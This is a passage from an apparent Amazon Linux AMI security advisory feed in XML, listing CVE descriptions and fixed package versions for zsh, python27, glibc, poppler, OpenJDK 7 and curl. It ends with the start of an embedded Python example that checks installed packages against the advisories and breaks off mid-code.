zsh through version 5.4.2 is vulnerable to a stack-based buffer overflow in the exec.c:hashcmd() function. A local attacker could exploit this to cause a denial of service.
1553531:
CVE-2018-1071 zsh: Stack-based buffer overflow in exec.c:hashcmd()
CVE-2017-18206:
In utils.c in zsh before 5.4, symlink expansion had a buffer overflow.
A buffer overflow flaw was found in the zsh shell symbolic link resolver. A local, unprivileged user can create a specially crafted directory path which leads to a buffer overflow in the context of the user trying to do a symbolic link resolution in the aforementioned path. If the user affected is privileged, this leads to privilege escalation.
1549861:
CVE-2017-18206 zsh: buffer overrun in xsymlinks
CVE-2017-18205:
In builtin.c in zsh before 5.4, when sh compatibility mode is used, there is a NULL pointer dereference during processing of the cd command with no argument if HOME is not set.
A NULL pointer dereference flaw was found in the code responsible for the cd builtin command of the zsh package. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549862:
CVE-2017-18205 zsh: NULL dereference in cd in sh compatibility mode under given circumstances
CVE-2014-10072:
A buffer overflow flaw was found in the zsh shell symbolic link resolver. A local, unprivileged user can create a specially crafted directory path which leads to a buffer overflow in the context of the user trying to do symbolic link resolution in the aforementioned path. An attacker could exploit this vulnerability to cause a denial of service condition on the target.
1549836:
CVE-2014-10072 zsh: buffer overflow when scanning very long directory paths for symbolic links
CVE-2014-10071:
A buffer overflow flaw was found in the zsh shell file descriptor redirection functionality. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549855:
CVE-2014-10071 zsh: buffer overflow for very long fds in >& fd syntax
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10071" title="" id="CVE-2014-10071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10072" title="" id="CVE-2014-10072" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18205" title="" id="CVE-2017-18205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18206" title="" id="CVE-2017-18206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1071" title="" id="CVE-2018-1071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1083" title="" id="CVE-2018-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1100" title="" id="CVE-2018-1100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7549" title="" id="CVE-2018-7549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zsh" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-debuginfo-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh-html" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-html-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh" version="5.0.2" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-5.0.2-31.17.amzn1.i686.rpm</filename></package><package name="zsh-html" version="5.0.2" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-html-5.0.2-31.17.amzn1.i686.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="31.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/zsh-debuginfo-5.0.2-31.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1108</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1108: medium priority package update for python27</title><issued date="2018-12-06 00:22:00" /><updated date="2018-12-07 00:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1061:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.
1549192:
CVE-2018-1061 python: DOS via regular expression backtracking in difflib.IS_LINE_JUNK method in difflib
CVE-2018-1060:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s pop3lib&#039;s apop() method. An attacker could use this flaw to cause denial of service.
1549191:
CVE-2018-1060 python: DOS via regular expression catastrophic backtracking in apop() method in pop3lib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1060" title="" id="CVE-2018-1060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1061" title="" id="CVE-2018-1061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.15" 
release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.15-1.124.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1109</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1109: medium priority package update for glibc</title><issued date="2018-12-06 00:24:00" /><updated date="2018-12-07 00:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6485:
An integer overflow in the implementation of the posix_memalign in memalign functions in the GNU C Library (aka glibc or libc6) 2.26 and earlier could cause these functions to return a pointer to a heap area that is too small, potentially leading to heap corruption.
1542102:
CVE-2018-6485 glibc: Integer overflow in posix_memalign in memalign functions
CVE-2018-11237:
A buffer overflow has been discovered in the GNU C Library (aka glibc or libc6) in the __mempcpy_avx512_no_vzeroupper function when particular conditions are met. An attacker could use this vulnerability to cause a denial of service or potentially execute code.
1581274:
CVE-2018-11237 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper
CVE-2018-11236:
stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.
1581269:
CVE-2018-11236 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow
CVE-2017-16997:
elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretation of an empty RPATH/RUNPATH token as the &quot;./&quot; directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.
1526865:
CVE-2017-16997 glibc: Incorrect handling of RPATH in elf/dl-load.c can be used to execute code loaded from arbitrary libraries
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16997" title="" id="CVE-2017-16997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11236" title="" id="CVE-2018-11236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11237" title="" id="CVE-2018-11237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6485" title="" id="CVE-2018-6485" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-260.175.amzn1.x86_64.rpm</filename></package><package 
name="glibc-headers" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-260.175.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-260.175.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1110</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1110: low priority package update for poppler</title><issued date="2018-12-06 00:26:00" 
/><updated date="2018-12-07 00:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13988:
Poppler through 0.62 contains an out-of-bounds read caused by an access to memory that is not mapped in the process address space, as demonstrated by pdfunite. This can result in memory corruption and denial of service, and may be exploitable when a victim opens a specially crafted PDF file.
1602838:
CVE-2018-13988 poppler: out of bounds read in pdfunite
CVE-2018-10768:
There is a NULL pointer dereference in the AnnotPath::getCoordsLength function in Annot.h in an Ubuntu package for Poppler 0.24.5. A crafted input will lead to a remote denial of service attack. Later Ubuntu packages such as for Poppler 0.41.0 are not affected.
1576169:
CVE-2018-10768 poppler: NULL pointer dereference in Annot.h:AnnotPath::getCoordsLength() allows for denial of service via crafted PDF
CVE-2017-18267:
The FoFiType1C::cvtGlyph function in fofi/FoFiType1C.cc in Poppler through 0.64.0 allows remote attackers to cause a denial of service (infinite recursion) via a crafted PDF file, as demonstrated by pdftops.
1578777:
CVE-2017-18267 poppler: Infinite recursion in fofi/FoFiType1C.cc:FoFiType1C::cvtGlyph() function allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18267" title="" id="CVE-2017-18267" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10768" title="" id="CVE-2018-10768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13988" title="" id="CVE-2018-13988" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-debuginfo" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="20.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/poppler-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-20.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1111</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1111: critical priority package update for java-1.7.0-openjdk</title><issued date="2018-12-06 00:28:00" /><updated date="2018-12-07 00:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3214:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Sound). Supported versions that are affected are Java SE: 6u201, 7u191 and 8u182; Java SE Embedded: 8u181; JRockit: R28.3.19. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1639301:
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
CVE-2018-3180:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JSSE). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via SSL/TLS to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded, JRockit accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded, JRockit accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).
1639484:
CVE-2018-3180 OpenJDK: Missing endpoint identification algorithm check during TLS session resumption (JSSE, 8202613)
CVE-2018-3169:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639293:
CVE-2018-3169 OpenJDK: Improper field access checks (Hotspot, 8199226)
CVE-2018-3149:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639834:
CVE-2018-3149 OpenJDK: Incomplete enforcement of the trustURLCodebase restriction (JNDI, 8199177)
CVE-2018-3139:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1639442:
CVE-2018-3139 OpenJDK: Leak of sensitive header data via HTTP redirect (Networking, 8196902)
CVE-2018-3136:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.4 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N).
1639755:
CVE-2018-3136 OpenJDK: Incorrect handling of unsigned attributes in signed Jar manifests (Security, 8194534)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3136" title="" id="CVE-2018-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3139" title="" id="CVE-2018-3139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3149" title="" id="CVE-2018-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3169" title="" id="CVE-2018-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3180" title="" id="CVE-2018-3180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3214" title="" id="CVE-2018-3214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.201-2.6.16.0.77.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1112</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1112: low priority package update for curl</title><issued date="2018-12-06 00:29:00" /><updated date="2018-12-07 00:55:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14618:
curl before version 7.61.1 is vulnerable to a buffer overrun in the NTLM authentication code. The internal function Curl_ntlm_core_mk_nt_hash multiplies the length of the password by two (SUM) to work out how large a temporary storage area to allocate from the heap. The length value is then used to iterate over the password and generate output into the allocated storage buffer. On systems with a 32 bit size_t, the math to calculate SUM triggers an integer overflow when the password length exceeds 2GB (2^31 bytes). This integer overflow usually causes a very small buffer to be allocated instead of the intended very large one, so that writing the output into it becomes a heap buffer overflow. (This bug is almost identical to CVE-2017-8816.)
1622707:
CVE-2018-14618 curl: NTLM password overflow via integer overflow
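<![CDATA[
Each advisory in this feed lists, per package and architecture, the exact epoch/version/release in which the fix ships; the practical check is whether every installed package is at or above that EVR. The following Python is an added example, not part of this feed or of Amazon's tooling: it parses a constructed updateinfo snippet modelled on ALAS-2018-1112, reimplements rpm's rpmvercmp() segment comparison (the '^' marker of newer rpm releases is not modelled), and reports which advisories still apply to a constructed installed-package snapshot. SAMPLE_INSTALLED, the helper names and the dict layout are assumptions made for the illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the ALAS-2018-1112 entry of this feed:
# one advisory, one CVE reference, three fixed x86_64 packages.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com">
<id>ALAS-2018-1112</id>
<title>Amazon Linux AMI 2014.03 - ALAS-2018-1112: low priority package update for curl</title>
<severity>low</severity>
<references>
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14618" id="CVE-2018-14618" type="cve"/>
</references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="curl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package>
<package name="libcurl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package>
<package name="libcurl-devel" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.85.amzn1.x86_64.rpm</filename></package>
</collection></pkglist>
</update>
</updates>"""

# Constructed snapshot of installed packages, keyed (name, arch) -> (epoch, version, release):
# curl is one release behind the fix, libcurl is already fixed, bash is not in the advisory.
SAMPLE_INSTALLED = {
    ("curl", "x86_64"): ("0", "7.53.1", "16.84.amzn1"),
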